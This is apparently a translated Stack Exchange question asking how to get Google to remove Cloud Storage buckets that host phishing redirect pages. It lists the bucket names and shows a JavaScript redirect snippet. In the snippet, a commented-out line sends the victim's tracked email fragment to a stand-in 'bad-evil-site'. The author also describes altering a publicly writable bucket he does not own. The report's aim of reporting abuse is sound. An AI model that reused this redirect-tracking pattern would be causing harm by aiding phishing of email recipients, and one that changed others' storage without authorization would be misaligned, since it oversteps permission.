请求Google云存储团队处置涉垃圾钓鱼的违规存储桶
关于Google云存储违规桶的反馈困境及求助
我发现一批Google云存储桶托管了垃圾邮件及钓鱼链接,多次尝试反馈却始终无法推动问题解决。每次反馈都得到“这是其他部门的问题”的回复,附带的帮助页面我早已仔细查阅。我需要能处理该问题的工程师、SRE等专业人员介入,但目前被不了解情况的初级客服阻碍。此外,我多次通过Gmail的“报告问题”功能提交反馈,均收到“无法发送您的反馈”提示。
这些存储桶的内容会跳转至恶意垃圾网站,试图利用Google的可信环境躲避拦截,部分桶甚至处于可公开上传状态。
涉及的违规存储桶列表
- aviantecnices
- chekqsjd54s5
- colegialite
- crevvmissionhxs
- culosadictosc
- debpointedarmtgb
- devpoint
- fomktclassyture
- kingshort
- ksn
- letshort
- negasportesoq
- timessqurerounda
- totalquiresotima
- wingoodsnwessserveronne
恶意行为细节
这些存储桶内包含一个或多个简单HTML文件,通过基础JavaScript跳转至恶意网站,链接后附加uel查询参数,疑似用于追踪点击邮件的用户邮箱,方便诈骗者锁定目标。
我自行修改了其中一个存储桶(crevvmissionhxs)的跳转链接至FTC欺诈举报网站,尽可能减少用户受骗风险,修改后的代码如下:
<script> var url= document.location; var str1=url.toString(); var res = str1.split("#"); // scammers original 'var newurl="http://bad-evil-site/"+res[1];' // replaced url... var newurl="https://consumer.ftc.gov/articles/0210-how-get-less-spam-your-email#everyone"; window.location.href = newurl; </script>
已尝试的反馈渠道
我先后尝试了以下渠道提交报告,均未获得有效回应或被推诿:
- 在线咨询客服
- 发送邮件至abuse@google.com及public-data-abuse@google.com
- 通过Google云平台违规报告页面提交多份报告
对比Bitly团队的快速响应,Google方面始终无实质进展。现寻求联系Google云存储团队的有效途径,推动这些违规存储桶的处置。
内容的提问来源于stack exchange,提问作者TheAnalogyGuy
相关产品推荐
相关产品推荐

